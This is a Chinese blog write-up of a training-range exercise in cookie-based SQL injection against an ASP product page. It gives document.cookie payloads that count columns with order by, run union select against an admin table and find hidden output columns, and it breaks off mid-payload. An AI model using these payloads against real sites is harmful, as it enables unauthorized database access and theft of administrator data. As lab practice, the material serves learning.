偏移注入靶场练习

本文介绍了在靶场环境中进行SQL注入实战的过程,通过调整SQL语句,逐步发现注入点和隐藏字段。通过二分法确定表的字段数,并利用数字后缀法找出所有隐藏的注入点,最终揭示了admin表的部分信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

document.cookie= “id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,admin. from admin”)
提示数据库报错,
一直减到:
document.cookie= “id=”+escape(“171 union select admin.
 from admin”)
仍然提示数据库报错。
说明注入点查询的表的字段数小于admin表中的字段数。

ps:漏洞不可能只存在一个,因为开发者开发思路是一样的,一般来说相似的漏洞会在同一个网站频繁出现。
在靶场产品中心的某个产品页面试下:
http://kypt8004.ia.aqlab.cn/ProductShow.asp?ID=105
document.cookie=”id=”+escape(“105 order by 1”) 页面正常
document.cookie=”id=”+escape(“105 order by 100”) 找不到此产品!
通过二分法不停找,发现26个字段。
document.cookie=”id=”+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)
可见3,5,7为注入点。
其实25也是注入点,隐藏在图片里。
那么,怎样才能把所有隐藏点都找到呢?
每个数字后面加一串容易辨识的长数字(随便什么数字),比如:
document.cookie=”id=”+escape(“105 union select 177777,277777,377777,477777,577777,677777,777777,877777,977777,1077777,1177777,1277777,1377777,14777

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值